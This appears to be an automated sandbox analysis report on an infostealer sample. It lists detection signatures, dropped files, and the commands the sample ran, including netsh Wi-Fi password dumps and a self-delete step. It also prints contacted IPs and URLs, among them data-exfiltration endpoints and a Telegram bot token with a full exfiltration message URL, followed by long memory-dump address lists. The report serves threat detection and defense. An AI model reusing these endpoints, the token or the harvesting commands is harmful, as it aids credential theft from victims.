Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

file.exe

PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

initial sample

Details

Filetype:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy:	7.426492166688313
Filename:	file.exe
Filesize:	315904
MD5:	d5b8ac0d80c99e7dda0d9df17c159f3d
SHA1:	ae1e0aeb3fbba55999b74047ee2b8bb4e45f108a
SHA256:	c330322b774eb263b008178ff707e13b843fd7df62445cca3c52356509c26f78
SHA512:	2637cc05aa402832dadbf48431f1add417b69a8351de2a5edae80283da7a6924166ea56bc85865dfa993d88f467d8f540528627e5cbe64cc67ec8d5a3d6655bc
SSDEEP:	6144:+MW2MDA5DDzwLLoMC9YsbxE0UyRtXpJldoopDIrhi7m:EREZELLoMeYkxEgJzTp
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F.!g............................).... ... ....@.. .......................@............@................................

Signature Hits	Behavior Group	Mitre Attack
Antivirus / Scanner detection for submitted sample	AV Detection
Multi AV Scanner detection for submitted file	AV Detection
Machine Learning detection for sample	AV Detection
Allocates memory with a write watch (potentially for evading sandboxes)	Malware Analysis System Evasion
Contains long sleeps (>= 3 min)	Malware Analysis System Evasion
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion
Drops PE files	Persistence and Installation Behavior	Access Token Manipulation
May sleep (evasive loops) to hinder dynamic analysis	Malware Analysis System Evasion
Queries the volume information (name, serial number etc) of a device	Language, Device and Operating System Detection
Sample file is different than original file name gathered from version info	System Summary	Access Token Manipulation
Uses 32bit PE files	Compliance, System Summary	Masquerading
Binary may include packed or encrypted code	Data Obfuscation	Obfuscated Files or Information Software Packing
PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)	System Summary
Contains medium sleeps (>= 30s)	Malware Analysis System Evasion
Creates files inside the user directory	System Summary	Masquerading
Creates guard pages, often used to prevent reverse engineering and debugging	Anti Debugging	Disable or Modify Tools
Creates temporary files	System Summary
Disables application error messsages (SetErrorMode)	Hooking and other Techniques for Hiding and Protection
Enumerates the file system	Spreading, Malware Analysis System Evasion	File and Directory Discovery
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)	Malware Analysis System Evasion	Security Software Discovery
PE file has an executable .text section and no other executable section	System Summary	Access Token Manipulation
Parts of this applications are using the .NET runtime (Probably coded in C#)	System Summary
Queries the cryptographic machine GUID	Language, Device and Operating System Detection	Access Token Manipulation
Reads ini files	System Summary
Reads software policies	System Summary	Access Token Manipulation
Sample is known by Antivirus	System Summary	Access Token Manipulation
Tries to load missing DLLs	System Summary	DLL Side-Loading
Uses an in-process (OLE) Automation server	System Summary	Access Token Manipulation
Contains modern PE file flags such as dynamic base (ASLR) or NX	Compliance, System Summary
PE file contains a COM descriptor data directory	System Summary
Uses Microsoft Silverlight	System Summary	Access Token Manipulation

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

CSV text

dropped

Details

File:	C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log
Category:	dropped
Dump:	file.exe.log.0.dr
ID:	dr_1
Target ID:	0
Process:	C:\Users\user\Desktop\file.exe
Type:	CSV text
Entropy:	5.360398796477698
Encrypted:	false
Ssdeep:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
Size:	226
Whitelisted:	false
Reputation:	timeout

Signature Hits	Behavior Group	Mitre Attack
Antivirus / Scanner detection for submitted sample	AV Detection
Multi AV Scanner detection for submitted file	AV Detection
Machine Learning detection for sample	AV Detection
Sample file is different than original file name gathered from version info	System Summary
Uses 32bit PE files	Compliance, System Summary
Binary may include packed or encrypted code	Data Obfuscation	Obfuscated Files or Information Software Packing
PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)	System Summary	Software Packing
Creates files inside the user directory	System Summary	Masquerading
PE file has an executable .text section and no other executable section	System Summary
Parts of this applications are using the .NET runtime (Probably coded in C#)	System Summary
Sample is known by Antivirus	System Summary
Contains modern PE file flags such as dynamic base (ASLR) or NX	Compliance, System Summary
PE file contains a COM descriptor data directory	System Summary

C:\Users\user\AppData\Local\Temp\build.exe

PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

dropped

Details

File:	C:\Users\user\AppData\Local\Temp\build.exe
Category:	dropped
Dump:	build.exe.0.dr
ID:	dr_0
Target ID:	0
Process:	C:\Users\user\Desktop\file.exe
Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy:	5.67134193263295
Encrypted:	false
Ssdeep:	3072:eNIgoEYdtOunUSqrkGA9bvFTLUKdDuQOdEu05hkOxAWP0w:emgoEMNAkGA9bvBLNOdE27Dw
Size:	228440
Whitelisted:	false
Reputation:	timeout

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Capture Wi-Fi password	Stealing of Sensitive Information
Machine Learning detection for dropped file	AV Detection
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)	Malware Analysis System Evasion	Security Software Discovery Windows Management Instrumentation
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)	Malware Analysis System Evasion	Security Software Discovery Windows Management Instrumentation Virtualization/Sandbox Evasion
Sigma detected: Invoke-Obfuscation CLIP+ Launcher	System Summary
Sigma detected: Invoke-Obfuscation VAR+ Launcher	System Summary
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)	Stealing of Sensitive Information	Credentials in Registry
Tries to harvest and steal WLAN passwords	Stealing of Sensitive Information
Tries to harvest and steal browser information (history, passwords, etc)	Stealing of Sensitive Information	Data from Local System OS Credential Dumping
Tries to steal Mail credentials (via file / registry access)	Stealing of Sensitive Information	Email Collection
Yara detected Generic Downloader	Networking
Allocates memory with a write watch (potentially for evading sandboxes)	Malware Analysis System Evasion	Virtualization/Sandbox Evasion
Contains functionality to call native functions	System Summary
Contains long sleeps (>= 3 min)	Malware Analysis System Evasion	Virtualization/Sandbox Evasion
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Detected potential crypto function	System Summary	Encrypted Channel Archive Collected Data
Drops PE files	Persistence and Installation Behavior
Enables debug privileges	Anti Debugging
Enables driver privileges	System Summary	LSASS Driver
Enables security privileges	System Summary
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)	Malware Analysis System Evasion
Found inlined nop instructions (likely shell or obfuscated code)	Software Vulnerabilities	Obfuscated Files or Information
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)	Malware Analysis System Evasion	System Information Discovery Security Software Discovery Windows Management Instrumentation Virtualization/Sandbox Evasion
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)	Malware Analysis System Evasion	Security Software Discovery Windows Management Instrumentation Virtualization/Sandbox Evasion
Queries the volume information (name, serial number etc) of a device	Language, Device and Operating System Detection	System Information Discovery
Sigma detected: Communication To Uncommon Destination Ports	System Summary
Uses Microsoft's Enhanced Cryptographic Provider	Cryptography	Encrypted Channel
Uses code obfuscation techniques (call, push, ret)	Data Obfuscation	Obfuscated Files or Information
Contains functionality to adjust token privileges (e.g. debug / backup)	System Summary	Access Token Manipulation
Contains medium sleeps (>= 30s)	Malware Analysis System Evasion	Virtualization/Sandbox Evasion
Creates mutexes	System Summary
Creates temporary files	System Summary
Disables application error messsages (SetErrorMode)	Hooking and other Techniques for Hiding and Protection
Queries a list of all running processes	Malware Analysis System Evasion	Process Discovery
Queries process information (via WMI, Win32_Process)	System Summary	System Information Discovery Windows Management Instrumentation
Spawns processes	System Summary	Process Injection
Tries to load missing DLLs	System Summary	DLL Side-Loading
Checks if Microsoft Office is installed	System Summary	System Information Discovery

C:\Users\user\AppData\Local\4wlo1v434o\report.lock

very short file (no magic)

dropped

Details

File:	C:\Users\user\AppData\Local\4wlo1v434o\report.lock
Category:	dropped
Dump:	report.lock.2.dr
ID:	dr_2
Target ID:	2
Process:	C:\Users\user\AppData\Local\Temp\build.exe
Type:	very short file (no magic)
Entropy:	0.0
Encrypted:	false
Ssdeep:	3:U:U
Size:	1
Whitelisted:	true
Reputation:	timeout

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\build.exe.log

CSV text

dropped

Details

File:	C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\build.exe.log
Category:	dropped
Dump:	build.exe.log.2.dr
ID:	dr_3
Target ID:	2
Process:	C:\Users\user\AppData\Local\Temp\build.exe
Type:	CSV text
Entropy:	5.364175471524945
Encrypted:	false
Ssdeep:	24:ML9E4KQEAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoC1qE4GIs0E4K6sXE4Npv:MxHKQEAHKKkKYHKGSI6oPtHTHK1qHGI8
Size:	1498
Whitelisted:	false
Reputation:	timeout

\Device\Null

ASCII text, with CRLF line terminators, with overstriking

dropped

Details

File:	\Device\Null
Category:	dropped
Dump:	Null.27.dr
ID:	dr_4
Target ID:	27
Process:	C:\Windows\System32\timeout.exe
Type:	ASCII text, with CRLF line terminators, with overstriking
Entropy:	4.41440934524794
Encrypted:	false
Ssdeep:	3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
Size:	60
Whitelisted:	false
Reputation:	timeout

Processes

Path

Cmdline

Malicious

C:\Users\user\Desktop\file.exe

"C:\Users\user\Desktop\file.exe"

C:\Users\user\AppData\Local\Temp\build.exe

"C:\Users\user\AppData\Local\Temp\build.exe"

C:\Windows\System32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\System32\netsh.exe

netsh wlan show profiles

C:\Windows\System32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Windows\System32\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\build.exe"

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\chcp.com

chcp 65001

C:\Windows\System32\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\chcp.com

chcp 65001

C:\Windows\System32\findstr.exe

findstr "SSID BSSID Signal"

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\chcp.com

chcp 65001

C:\Windows\System32\timeout.exe

timeout /t 3

There are 6 hidden processes, click here to show them.

URLs

Name

Malicious

https://api.telegram.org

unknown

https://api.telegram.org/bot

unknown

http://41.216.183.9:8080/sendData?pk=MDhCREMyMTRGMDQ3ODIxQUI0NDJDRjRDQ0IzMEMxMUQ=&ta=U29mdHdhcmU=&un=ZnJvbnRkZXNr&pc=OTI3NTM3&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MA==

41.216.183.9

https://api.telegram.org/bot7722280561:AAEgRsAuRdqeD2qmEUjdhEM6F9R5eAxwIT4/sendMessage

unknown

https://api.tele

unknown

https://duckduckgo.com/chrome_newtab

unknown

http://209.38.221.184:80802

unknown

https://duckduckgo.com/ac/?q=

unknown

http://185.217.98.121:80

unknown

https://138.2.92.67:443

unknown

http://209.38.221.184:8080/%79%4C%57%46%64%5F%66%72%6F%6E%74%64%65%73%6B%40%39%32%37%35%33%37%5F%72%

unknown

http://209.38.221.184:8080/yLWFd_user

unknown

http://167.235.70.96:8080

unknown

http://20.78.55.47:8080

unknown

https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=

unknown

http://107.161.20.142:8080

unknown

https://5.196.181.135:443

unknown

http://101.43.160.136:8080

unknown

http://41.216.183.9:8080/sendData

unknown

https://192.99.196.191:443

unknown

http://168.138.211.88:8099

unknown

http://ip-api.com/line?fields=query,country

208.95.112.1

http://18.228.80.130:80

unknown

http://209.38.221.184:8080/I85OAzj7Op/yLWFd_user

unknown

https://api.telegram.org/bot7722280561:AAEgRsAuRdqeD2qmEUjdhEM6F9R5eAxwIT4/sendMessage?chat_id=77347

unknown

https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search

unknown

http://ip-api.com

unknown

http://209.38.221.184:8080/yLWFd_user%40927537_report.wsr

unknown

http://185.217.98.121:8080

unknown

http://8.219.110.16:9999

unknown

http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

unknown

http://209.38.221.184

unknown

https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK

unknown

http://8.216.92.21:8080

unknown

http://65.49.205.24:8080

unknown

http://47.96.78.224:8080

unknown

http://129.151.109.160:8080

unknown

https://www.google.com/images/branding/product/ico/googleg_lodp.ico

unknown

http://147.28.185.29:80

unknown

http://schemas.xmlsoap.org/soap/encoding/

unknown

https://154.9.207.142:443

unknown

http://41.216.183.9:80802

unknown

http://209.38.221.184:8080

unknown

http://209.38.221.184:8080/get

unknown

http://www.w3.or

unknown

https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=

unknown

http://206.166.251.4:8080

unknown

http://209.38.221.184:8080/get/I85OAzj7Op/yLWFd_user

unknown

http://194.164.198.113:8080

unknown

http://38.207.174.88:8080

unknown

http://ip-api.com/line?fields=query

unknown

http://127.0.0.1:18772/handleOpenWSR?r=http://209.38.221.184:8080/get/I85OAzj7Op/yLWFd_user

unknown

http://159.203.174.113:8090

unknown

http://101.126.19.171:80

unknown

https://www.ecosia.org/newtab/

unknown

https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br

unknown

http://41.216.183.9:8080/sendData?pk=MDhCREMyMTRGMDQ3ODIxQUI0NDJDRjRDQ0IzMEMxMUQ=&ta=U29mdHdhcmU=&un

unknown

https://185.217.98.121:443

unknown

http://46.235.26.83:8080

unknown

https://ac.ecosia.org/autocomplete?q=

unknown

http://116.202.101.219:8080

unknown

http://38.60.191.38:80

unknown

http://67.230.176.97:8080

unknown

http://132.145.17.167:9090

unknown

http://schemas.xmlsoap.org/wsdl/

unknown

https://api.telegram.org/bot7722280561:AAEgRsAuRdqeD2qmEUjdhEM6F9R5eAxwIT4/sendMessage?chat_id=7734728653&text=%23Software%20%20%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E927537%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.12Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F209.38.221.184%3A8080%2Fget%2FI85OAzj7Op%2FyLWFd_user%40927537_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F209.38.221.184%3A8080%2Fget%2FI85OAzj7Op%2FyLWFd_user%40927537_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML

149.154.167.220

http://127.0.0.1:18772/handleOpenWSR?r=

unknown

http://51.159.4.50:8080

unknown

http://8.222.143.111:8080

unknown

http://41.216.183.9:8080

unknown

https://support.mozilla.org

unknown

http://41.87.207.180:9090

unknown

http://api.telegram.org

unknown

https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=

unknown

There are 64 hidden URLs, click here to show them.

Domains

Name

Malicious

api.telegram.org

149.154.167.220

Details

Name:	api.telegram.org
IP:	149.154.167.220
TargetID:	-1
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Found malware configuration	AV Detection
Uses the Telegram API (likely for C&C communication)	Networking	Web Service
HTTP GET or POST without a user agent	Networking
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
URLs found in memory or binary data	Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

ip-api.com

208.95.112.1

Details

Name:	ip-api.com
IP:	208.95.112.1
TargetID:	-1
Active:	true

Signature Hits	Behavior Group	Mitre Attack
HTTP GET or POST without a user agent	Networking
May check the online IP address of the machine	Networking	System Network Configuration Discovery
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
URLs found in memory or binary data	Networking

IPs

Domain

Country

Malicious

209.38.221.184

unknown

United States

Details

IP:	209.38.221.184
TargetID:	2
Current Path:	C:\Users\user\AppData\Local\Temp\build.exe
Country:	United States
Countrycode:	USA
ASN number:	7018
ASN name:	ATT-INTERNET4US
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Suricata IDS alerts for network traffic	Networking
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port
HTTP GET or POST without a user agent	Networking
Connects to IPs without corresponding DNS lookups	Networking
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
URLs found in memory or binary data	Networking

149.154.167.220

api.telegram.org

United Kingdom

Details

IP:	149.154.167.220
TargetID:	2
Current Path:	C:\Users\user\AppData\Local\Temp\build.exe
Country:	United Kingdom
Countrycode:	GBR
ASN number:	62041
ASN name:	TELEGRAMRU
Private:	false
Domain:	api.telegram.org

Signature Hits	Behavior Group	Mitre Attack
Uses secure TLS version for HTTPS connections	Compliance, Networking

41.216.183.9

unknown

South Africa

Details

IP:	41.216.183.9
TargetID:	2
Current Path:	C:\Users\user\AppData\Local\Temp\build.exe
Country:	South Africa
Countrycode:	ZAF
ASN number:	40676
ASN name:	AS40676US
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Suricata IDS alerts for network traffic	Networking
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port
HTTP GET or POST without a user agent	Networking
Sigma detected: Communication To Uncommon Destination Ports	System Summary
Connects to IPs without corresponding DNS lookups	Networking
Posts data to webserver	Networking	Application Layer Protocol Non-Application Layer Protocol
URLs found in memory or binary data	Networking

208.95.112.1

ip-api.com

United States

Registry

Path

Value

Malicious

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\build_RASAPI32

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\build_RASAPI32

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\build_RASAPI32

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\build_RASAPI32

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\build_RASAPI32

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\build_RASAPI32

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\build_RASAPI32

FileDirectory

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\build_RASMANCS

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\build_RASMANCS

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\build_RASMANCS

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\build_RASMANCS

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\build_RASMANCS

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\build_RASMANCS

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\build_RASMANCS

FileDirectory

There are 4 hidden registries, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

26B66AC1000

trusted library allocation

page read and write

26B6703D000

trusted library allocation

page read and write

26B76BA0000

trusted library allocation

page read and write

1073A220000

heap

page read and write

27091FA1000

heap

page read and write

26B781C3000

trusted library allocation

page read and write

27091EF0000

heap

page read and write

55BC000

stack

page read and write

7FFAACD70000

trusted library allocation

page read and write

26B66EC4000

trusted library allocation

page read and write

26B78197000

trusted library allocation

page read and write

27091EE0000

heap

page read and write

26B781D3000

trusted library allocation

page read and write

26B7822A000

trusted library allocation

page read and write

26B7719E000

trusted library allocation

page read and write

26B66EA8000

trusted library allocation

page read and write

7FFAACD60000

trusted library allocation

page read and write

27092230000

heap

page read and write

26B76CAE000

trusted library allocation

page read and write

2600129D000

heap

page read and write

533E000

stack

page read and write

1E8DAFA5000

heap

page read and write

244F2100000

heap

page read and write

26B64C30000

unkown

page readonly

26B782BD000

trusted library allocation

page read and write

238D1CC0000

heap

page read and write

9C4000

trusted library allocation

page read and write

7FFAACBD0000

trusted library allocation

page read and write

26B7F330000

heap

page read and write

7FFAACC7C000

trusted library allocation

page execute and read and write

26B64ED0000

heap

page read and write

26B66887000

heap

page read and write

7E0000

trusted library allocation

page read and write

7F1A7FF000

stack

page read and write

26B781B1000

trusted library allocation

page read and write

7F1A6FF000

unkown

page read and write

27091FA2000

heap

page read and write

26B78473000

trusted library allocation

page read and write

7FFB1D540000

unkown

page readonly

2670000

heap

page read and write

26B66C09000

trusted library allocation

page read and write

B8F000

stack

page read and write

26B77BF3000

trusted library allocation

page read and write

9CD000

trusted library allocation

page execute and read and write

7FFAACBC0000

trusted library allocation

page read and write

26001287000

heap

page read and write

E6D927E000

stack

page read and write

26B77413000

trusted library allocation

page read and write

26B66BFC000

trusted library allocation

page read and write

26B76C17000

trusted library allocation

page read and write

1E8DADC0000

heap

page read and write

26B670D4000

trusted library allocation

page read and write

26B782E8000

trusted library allocation

page read and write

26B77263000

trusted library allocation

page read and write

26B77AF3000

trusted library allocation

page read and write

26B66EB4000

trusted library allocation

page read and write

1073A1E0000

heap

page read and write

9F7000

trusted library allocation

page execute and read and write

26B76D76000

trusted library allocation

page read and write

803C4FC000

stack

page read and write

876000

heap

page read and write

26B783E8000

trusted library allocation

page read and write

26B781F1000

trusted library allocation

page read and write

26B77328000

trusted library allocation

page read and write

265E000

stack

page read and write

26B781EB000

trusted library allocation

page read and write

4AC0000

heap

page read and write

26B781F3000

trusted library allocation

page read and write

26B66D86000

trusted library allocation

page read and write

7FFAACBCD000

trusted library allocation

page execute and read and write

26B77221000

trusted library allocation

page read and write

26B78250000

trusted library allocation

page read and write

26B781E2000

trusted library allocation

page read and write

26B66876000

heap

page read and write

26B7831D000

trusted library allocation

page read and write

26B66C0D000

trusted library allocation

page read and write

81C000

heap

page read and write

26B66CE0000

trusted library allocation

page read and write

80758FC000

stack

page read and write

26B76B97000

trusted library allocation

page read and write

26B76D7E000

trusted library allocation

page read and write

26B64F90000

heap

page read and write

2F2000

unkown

page readonly

26B64CF0000

heap

page read and write

26B00607000

heap

page read and write

29EB7F000

stack

page read and write

26B66C0F000

trusted library allocation

page read and write

26B66B48000

trusted library allocation

page read and write

26B64E12000

heap

page read and write

26B66D9B000

trusted library allocation

page read and write

7FFAACD90000

trusted library allocation

page read and write

26B7823F000

trusted library allocation

page read and write

7FFAACBC3000

trusted library allocation

page execute and read and write

26B77213000

trusted library allocation

page read and write

26B6706F000

trusted library allocation

page read and write

26B66EFB000

trusted library allocation

page read and write

26B66C07000

trusted library allocation

page read and write

26B00510000

heap

page read and write

1073A1A0000

heap

page read and write

26B66BC1000

trusted library allocation

page read and write

7F1A3EC000

stack

page read and write

26B771E7000

trusted library allocation

page read and write

547E000

stack

page read and write

26B66E49000

trusted library allocation

page read and write

26B77AB3000

trusted library allocation

page read and write

26B783FD000

trusted library allocation

page read and write

26B00700000

heap

page read and write

26B7729D000

trusted library allocation

page read and write

26001225000

heap

page read and write

3685000

trusted library allocation

page read and write

26B66A40000

trusted library allocation

page read and write

26B783F3000

trusted library allocation

page read and write

26B66EE4000

trusted library allocation

page read and write

26B77BD3000

trusted library allocation

page read and write

7FFAACC80000

trusted library allocation

page execute and read and write

80759FF000

stack

page read and write

26B64E3A000

heap

page read and write

4E5E000

stack

page read and write

244F0850000

heap

page read and write

26B66C36000

trusted library allocation

page read and write

27092235000

heap

page read and write

26B66D06000

trusted library allocation

page read and write

26B76B52000

trusted library allocation

page read and write

26B66B2E000

trusted library allocation

page read and write

26B66B61000

trusted library allocation

page read and write

803BDFE000

stack

page read and write

26B7743D000

trusted library allocation

page read and write

26B77BFD000

trusted library allocation

page read and write

26B670AD000

trusted library allocation

page read and write

26B66B3B000

trusted library allocation

page read and write

26B7825D000

trusted library allocation

page read and write

26B66FAB000

trusted library allocation

page read and write

27091F8D000

heap

page read and write

26B66C2B000

trusted library allocation

page read and write

7FFAACCA6000

trusted library allocation

page execute and read and write

26B76BB3000

trusted library allocation

page read and write

26B66F04000

trusted library allocation

page read and write

803B1FE000

stack

page read and write

260012A2000

heap

page read and write

26B7741D000

trusted library allocation

page read and write

4E1E000

stack

page read and write

26B66DD8000

trusted library allocation

page read and write

803B3FF000

stack

page read and write

75D000

stack

page read and write

26B774B3000

trusted library allocation

page read and write

26B77AA8000

trusted library allocation

page read and write

817000

heap

page read and write

244F2215000

heap

page read and write

807597F000

stack

page read and write

56BC000

stack

page read and write

26B7724F000

trusted library allocation

page read and write

26B76E0D000

trusted library allocation

page read and write

26B64F80000

trusted library allocation

page read and write

26B668C9000

heap

page read and write

26B66C2D000

trusted library allocation

page read and write

26B77BDD000

trusted library allocation

page read and write

2B0000

unkown

page readonly

26B66B35000

trusted library allocation

page read and write

7BE000

stack

page read and write

26B66BA6000

trusted library allocation

page read and write

26B66C29000

trusted library allocation

page read and write

27091F76000

heap

page read and write

26B77290000

trusted library allocation

page read and write

3681000

trusted library allocation

page read and write

26B00737000

heap

page read and write

775000

heap

page read and write

A70000

trusted library allocation

page read and write

26B782B3000

trusted library allocation

page read and write

26B76CB6000

trusted library allocation

page read and write

26B78313000

trusted library allocation

page read and write

26B6692E000

heap

page read and write

26B64E8B000

heap

page read and write

26B76B5F000

trusted library allocation

page read and write

26B67090000

trusted library allocation

page read and write

26B782DB000

trusted library allocation

page read and write

770000

heap

page read and write

26B76C47000

trusted library allocation

page read and write

26B781CF000

trusted library allocation

page read and write

26B64FA0000

heap

page read and write

26B781D7000

trusted library allocation

page read and write

26B78230000

trusted library allocation

page read and write

26B772F3000

trusted library allocation

page read and write

803B6FE000

stack

page read and write

244F0859000

heap

page read and write

27091F90000

heap

page read and write

26B78186000

trusted library allocation

page read and write

26B782A8000

trusted library allocation

page read and write

26B64C32000

unkown

page readonly

26B66E98000

trusted library allocation

page read and write

26B670C1000

trusted library allocation

page read and write

26B66D00000

trusted library allocation

page read and write

26B66C05000

trusted library allocation

page read and write

26B783DD000

trusted library allocation

page read and write

7FFAACDC6000

trusted library allocation

page read and write

A5E000

stack

page read and write

26B76B32000

trusted library allocation

page read and write

26B781C7000

trusted library allocation

page read and write

26B76B74000

trusted library allocation

page read and write

26B66AB0000

heap

page execute and read and write

7FFAACBE0000

trusted library allocation

page read and write

26B6712C000

trusted library allocation

page read and write

26B781E8000

trusted library allocation

page read and write

7FFAACC70000

trusted library allocation

page read and write

26B76CA4000

trusted library allocation

page read and write

4CD0000

heap

page execute and read and write

26B670D2000

trusted library allocation

page read and write

26B64DF2000

heap

page read and write

26B78348000

trusted library allocation

page read and write

26B64F60000

trusted library allocation

page read and write

7FFB1D560000

unkown

page read and write

26B7722C000

trusted library allocation

page read and write

26B66DB8000

trusted library allocation

page read and write

26B76BA4000

trusted library allocation

page read and write

26B774FD000

trusted library allocation

page read and write

26B771F1000

trusted library allocation

page read and write

7FFAACDB0000

trusted library allocation

page execute and read and write

260012B4000

heap

page read and write

710000

heap

page read and write

26B66BF2000

trusted library allocation

page read and write

26B76D5E000

trusted library allocation

page read and write

26B7EAF0000

trusted library allocation

page read and write

1AB2B7F000

stack

page read and write

26B78249000

trusted library allocation

page read and write

8A0000

heap

page read and write

26B771A2000

trusted library allocation

page read and write

27091F8C000

heap

page read and write

26B771C3000

trusted library allocation

page read and write

26B66BC3000

trusted library allocation

page read and write

26B78164000

trusted library allocation

page read and write

26B77BE8000

trusted library allocation

page read and write

26B782FD000

trusted library allocation

page read and write

260011D0000

heap

page read and write

7FFAACD85000

trusted library allocation

page read and write

26B772E8000

trusted library allocation

page read and write

26B78238000

trusted library allocation

page read and write

26B78183000

trusted library allocation

page read and write

26B76DD6000

trusted library allocation

page read and write

26B64F95000

heap

page read and write

26B66FAF000

trusted library allocation

page read and write

803B4FC000

stack

page read and write

2550000

heap

page execute and read and write

26B771A7000

trusted library allocation

page read and write

7FFAACD80000

trusted library allocation

page read and write

26B7727F000

trusted library allocation

page read and write

26B66843000

heap

page read and write

803BEFE000

stack

page read and write

26B66F0A000

trusted library allocation

page read and write

7FF45A970000

trusted library allocation

page execute and read and write

26B77216000

trusted library allocation

page read and write

26B66ECB000

trusted library allocation

page read and write

899000

heap

page read and write

26B77388000

trusted library allocation

page read and write

26B6705D000

trusted library allocation

page read and write

26B779BD000

trusted library allocation

page read and write

803BAFB000

stack

page read and write

511F000

stack

page read and write

26B670BF000

trusted library allocation

page read and write

2600128C000

heap

page read and write

26B77B1D000

trusted library allocation

page read and write

7FFAACC76000

trusted library allocation

